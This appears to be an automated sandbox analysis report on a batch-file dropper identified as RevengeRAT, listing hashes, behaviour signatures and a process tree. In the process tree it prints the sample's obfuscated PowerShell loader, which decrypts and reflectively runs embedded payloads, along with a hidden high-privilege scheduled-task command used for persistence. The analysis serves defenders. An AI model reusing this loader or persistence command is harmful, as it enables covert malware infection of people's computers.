Analysis
-
max time kernel
57s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
11/06/2024, 05:15
Static task
static1
Behavioral task
behavioral1
Sample
Client.bat
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
Client.bat
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Client.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral4
Sample
Client.bat
Resource
win11-20240508-en
General
-
Target
Client.bat
-
Size
286KB
-
MD5
63c935a02276c2876f0f40f6ca93de5b
-
SHA1
06f5951a19367f0d348c0ba4055b42aa2ffcc724
-
SHA256
8ef692bc1808ce731aebee08f730c9d0a5b6d4695dafab2d420201247f717fc8
-
SHA512
be0cc7ac331c5613cb567749e0d1b76730620fbb6440a9a2a4a4bfdc719fdd49e466b2685fe0133e77e794f1c49bf7cdcca391e564b3ca8979c5ed6529adae79
-
SSDEEP
6144:P2xqkImYc6Cyaf3OXrio+jPv1Ra4LfIb55oXNs7attGR9:+qgVylXrio+Tt4rN5ci7a2R9
Malware Config
Signatures
-
RevengeRAT
Remote-access trojan with a wide range of capabilities.
-
RevengeRat Executable 1 IoCs
resource yara_rule behavioral4/memory/4188-140-0x000001AF79210000-0x000001AF79224000-memory.dmp revengerat -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 4188 powershell.exe 4556 powershell.exe 1864 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 4556 powershell.exe 4556 powershell.exe 1864 powershell.exe 1864 powershell.exe 4188 powershell.exe 4188 powershell.exe 4188 powershell.exe 4188 powershell.exe 4188 powershell.exe 4188 powershell.exe 4188 powershell.exe 4188 powershell.exe 4188 powershell.exe 4188 powershell.exe 4188 powershell.exe 4188 powershell.exe 4188 powershell.exe 4188 powershell.exe 4188 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4556 powershell.exe Token: SeDebugPrivilege 1864 powershell.exe Token: SeIncreaseQuotaPrivilege 1864 powershell.exe Token: SeSecurityPrivilege 1864 powershell.exe Token: SeTakeOwnershipPrivilege 1864 powershell.exe Token: SeLoadDriverPrivilege 1864 powershell.exe Token: SeSystemProfilePrivilege 1864 powershell.exe Token: SeSystemtimePrivilege 1864 powershell.exe Token: SeProfSingleProcessPrivilege 1864 powershell.exe Token: SeIncBasePriorityPrivilege 1864 powershell.exe Token: SeCreatePagefilePrivilege 1864 powershell.exe Token: SeBackupPrivilege 1864 powershell.exe Token: SeRestorePrivilege 1864 powershell.exe Token: SeShutdownPrivilege 1864 powershell.exe Token: SeDebugPrivilege 1864 powershell.exe Token: SeSystemEnvironmentPrivilege 1864 powershell.exe Token: SeRemoteShutdownPrivilege 1864 powershell.exe Token: SeUndockPrivilege 1864 powershell.exe Token: SeManageVolumePrivilege 1864 powershell.exe Token: 33 1864 powershell.exe Token: 34 1864 powershell.exe Token: 35 1864 powershell.exe Token: 36 1864 powershell.exe Token: SeIncreaseQuotaPrivilege 1864 powershell.exe Token: SeSecurityPrivilege 1864 powershell.exe Token: SeTakeOwnershipPrivilege 1864 powershell.exe Token: SeLoadDriverPrivilege 1864 powershell.exe Token: SeSystemProfilePrivilege 1864 powershell.exe Token: SeSystemtimePrivilege 1864 powershell.exe Token: SeProfSingleProcessPrivilege 1864 powershell.exe Token: SeIncBasePriorityPrivilege 1864 powershell.exe Token: SeCreatePagefilePrivilege 1864 powershell.exe Token: SeBackupPrivilege 1864 powershell.exe Token: SeRestorePrivilege 1864 powershell.exe Token: SeShutdownPrivilege 1864 powershell.exe Token: SeDebugPrivilege 1864 powershell.exe Token: SeSystemEnvironmentPrivilege 1864 powershell.exe Token: SeRemoteShutdownPrivilege 1864 powershell.exe Token: SeUndockPrivilege 1864 powershell.exe Token: SeManageVolumePrivilege 1864 powershell.exe Token: 33 1864 powershell.exe Token: 34 1864 powershell.exe Token: 35 1864 powershell.exe Token: 36 1864 powershell.exe Token: SeIncreaseQuotaPrivilege 1864 powershell.exe Token: SeSecurityPrivilege 1864 powershell.exe Token: SeTakeOwnershipPrivilege 1864 powershell.exe Token: SeLoadDriverPrivilege 1864 powershell.exe Token: SeSystemProfilePrivilege 1864 powershell.exe Token: SeSystemtimePrivilege 1864 powershell.exe Token: SeProfSingleProcessPrivilege 1864 powershell.exe Token: SeIncBasePriorityPrivilege 1864 powershell.exe Token: SeCreatePagefilePrivilege 1864 powershell.exe Token: SeBackupPrivilege 1864 powershell.exe Token: SeRestorePrivilege 1864 powershell.exe Token: SeShutdownPrivilege 1864 powershell.exe Token: SeDebugPrivilege 1864 powershell.exe Token: SeSystemEnvironmentPrivilege 1864 powershell.exe Token: SeRemoteShutdownPrivilege 1864 powershell.exe Token: SeUndockPrivilege 1864 powershell.exe Token: SeManageVolumePrivilege 1864 powershell.exe Token: 33 1864 powershell.exe Token: 34 1864 powershell.exe Token: 35 1864 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4704 wrote to memory of 4016 4704 cmd.exe 81 PID 4704 wrote to memory of 4016 4704 cmd.exe 81 PID 4016 wrote to memory of 2032 4016 net.exe 82 PID 4016 wrote to memory of 2032 4016 net.exe 82 PID 4704 wrote to memory of 4856 4704 cmd.exe 83 PID 4704 wrote to memory of 4856 4704 cmd.exe 83 PID 4704 wrote to memory of 4556 4704 cmd.exe 84 PID 4704 wrote to memory of 4556 4704 cmd.exe 84 PID 4556 wrote to memory of 1864 4556 powershell.exe 85 PID 4556 wrote to memory of 1864 4556 powershell.exe 85 PID 4556 wrote to memory of 3464 4556 powershell.exe 88 PID 4556 wrote to memory of 3464 4556 powershell.exe 88 PID 3464 wrote to memory of 3500 3464 WScript.exe 89 PID 3464 wrote to memory of 3500 3464 WScript.exe 89 PID 3500 wrote to memory of 384 3500 cmd.exe 91 PID 3500 wrote to memory of 384 3500 cmd.exe 91 PID 384 wrote to memory of 2020 384 net.exe 92 PID 384 wrote to memory of 2020 384 net.exe 92 PID 3500 wrote to memory of 3076 3500 cmd.exe 93 PID 3500 wrote to memory of 3076 3500 cmd.exe 93 PID 3500 wrote to memory of 4188 3500 cmd.exe 94 PID 3500 wrote to memory of 4188 3500 cmd.exe 94 PID 4188 wrote to memory of 3288 4188 powershell.exe 53 PID 4188 wrote to memory of 2360 4188 powershell.exe 40 PID 4188 wrote to memory of 2552 4188 powershell.exe 43 PID 4188 wrote to memory of 1948 4188 powershell.exe 34 PID 4188 wrote to memory of 1356 4188 powershell.exe 23 PID 4188 wrote to memory of 1944 4188 powershell.exe 33 PID 4188 wrote to memory of 2728 4188 powershell.exe 47 PID 4188 wrote to memory of 2052 4188 powershell.exe 74 PID 4188 wrote to memory of 4100 4188 powershell.exe 65 PID 4188 wrote to memory of 2720 4188 powershell.exe 46 PID 4188 wrote to memory of 1140 4188 powershell.exe 19 PID 4188 wrote to memory of 2516 4188 powershell.exe 42 PID 4188 wrote to memory of 2736 4188 powershell.exe 48 PID 4188 wrote to memory of 936 4188 powershell.exe 11 PID 4188 wrote to memory of 2508 4188 powershell.exe 41 PID 4188 wrote to memory of 1128 4188 powershell.exe 18 PID 4188 wrote to memory of 2144 4188 powershell.exe 36 PID 4188 wrote to memory of 1120 4188 powershell.exe 17 PID 4188 wrote to memory of 2300 4188 powershell.exe 39 PID 4188 wrote to memory of 1112 4188 powershell.exe 32 PID 4188 wrote to memory of 3480 4188 powershell.exe 55 PID 4188 wrote to memory of 1312 4188 powershell.exe 22 PID 4188 wrote to memory of 1104 4188 powershell.exe 16 PID 4188 wrote to memory of 2272 4188 powershell.exe 38 PID 4188 wrote to memory of 4832 4188 powershell.exe 70 PID 4188 wrote to memory of 4432 4188 powershell.exe 63 PID 4188 wrote to memory of 4036 4188 powershell.exe 59 PID 4188 wrote to memory of 2064 4188 powershell.exe 35 PID 4188 wrote to memory of 3440 4188 powershell.exe 54 PID 4188 wrote to memory of 680 4188 powershell.exe 14 PID 4188 wrote to memory of 1664 4188 powershell.exe 27 PID 4188 wrote to memory of 2644 4188 powershell.exe 44 PID 4188 wrote to memory of 1844 4188 powershell.exe 31 PID 4188 wrote to memory of 1252 4188 powershell.exe 21 PID 4188 wrote to memory of 408 4188 powershell.exe 71 PID 4188 wrote to memory of 848 4188 powershell.exe 66 PID 4188 wrote to memory of 1632 4188 powershell.exe 26 PID 4188 wrote to memory of 1044 4188 powershell.exe 15 PID 4188 wrote to memory of 1432 4188 powershell.exe 24 PID 4188 wrote to memory of 1824 4188 powershell.exe 30 PID 4188 wrote to memory of 3004 4188 powershell.exe 50 PID 4188 wrote to memory of 1228 4188 powershell.exe 20
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵PID:812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵PID:936
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:1000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:680
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵PID:1120
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1128
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1228
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1432
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1604
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1632
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1796
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1824
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1844
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1112
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1948
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵PID:2272
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2300
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2508
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2516
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2644
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2728
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2736
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3004
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3288
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\system32\net.exenet file3⤵
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file4⤵PID:2032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vUD33ojbuK5qcJP0aHOsz+UQ2Xco8FPhu/tJAikRbUw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ezvKJ197aUaeoNaZ7EnUWg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $nXpVF=New-Object System.IO.MemoryStream(,$param_var); $cpMTV=New-Object System.IO.MemoryStream; $CTTbn=New-Object System.IO.Compression.GZipStream($nXpVF, [IO.Compression.CompressionMode]::Decompress); $CTTbn.CopyTo($cpMTV); $CTTbn.Dispose(); $nXpVF.Dispose(); $cpMTV.Dispose(); $cpMTV.ToArray();}function execute_function($param_var,$param2_var){ $joTzJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUNvT=$joTzJ.EntryPoint; $rUNvT.Invoke($null, $param2_var);}$roMlk = 'C:\Users\Admin\AppData\Local\Temp\Client.bat';$host.UI.RawUI.WindowTitle = $roMlk;$vrXeC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($roMlk).Split([Environment]::NewLine);foreach ($iHPLf in $vrXeC) { if ($iHPLf.StartsWith('OMbuGMngZwfFIXvfXjdn')) { $uKYUX=$iHPLf.Substring(20); break; }}$payloads_var=[string[]]$uKYUX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:4856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_51_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_51.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_51.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_51.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\system32\net.exenet file6⤵
- Suspicious use of WriteProcessMemory
PID:384 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file7⤵PID:2020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vUD33ojbuK5qcJP0aHOsz+UQ2Xco8FPhu/tJAikRbUw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ezvKJ197aUaeoNaZ7EnUWg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $nXpVF=New-Object System.IO.MemoryStream(,$param_var); $cpMTV=New-Object System.IO.MemoryStream; $CTTbn=New-Object System.IO.Compression.GZipStream($nXpVF, [IO.Compression.CompressionMode]::Decompress); $CTTbn.CopyTo($cpMTV); $CTTbn.Dispose(); $nXpVF.Dispose(); $cpMTV.Dispose(); $cpMTV.ToArray();}function execute_function($param_var,$param2_var){ $joTzJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUNvT=$joTzJ.EntryPoint; $rUNvT.Invoke($null, $param2_var);}$roMlk = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_51.bat';$host.UI.RawUI.WindowTitle = $roMlk;$vrXeC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($roMlk).Split([Environment]::NewLine);foreach ($iHPLf in $vrXeC) { if ($iHPLf.StartsWith('OMbuGMngZwfFIXvfXjdn')) { $uKYUX=$iHPLf.Substring(20); break; }}$payloads_var=[string[]]$uKYUX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:3076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4188
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:4036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:848
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:408
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2052
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD53ec0d76d886b2f4b9f1e3da7ce9e2cd7
SHA168a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea
SHA256214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5
SHA512a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
286KB
MD563c935a02276c2876f0f40f6ca93de5b
SHA106f5951a19367f0d348c0ba4055b42aa2ffcc724
SHA2568ef692bc1808ce731aebee08f730c9d0a5b6d4695dafab2d420201247f717fc8
SHA512be0cc7ac331c5613cb567749e0d1b76730620fbb6440a9a2a4a4bfdc719fdd49e466b2685fe0133e77e794f1c49bf7cdcca391e564b3ca8979c5ed6529adae79
-
Filesize
123B
MD53f90996b5a3353a9099272ed1cd11ed6
SHA1a3307fc76a3be87d2eb25cd4eac6a5e48237dc3f
SHA2568353b04c3ff4c06516cccbfe40ff434efa7d61bcb09f1f55fe7aa529a89e6333
SHA512cd3693097b064987c06ef4dac6ea57341270d7e5a7e19ca7f42de4a135d17f7dd90b3369b607e2940afca1ca9169a234ecc3bc1ba2b04cfe0bb9da2e3fe01c9e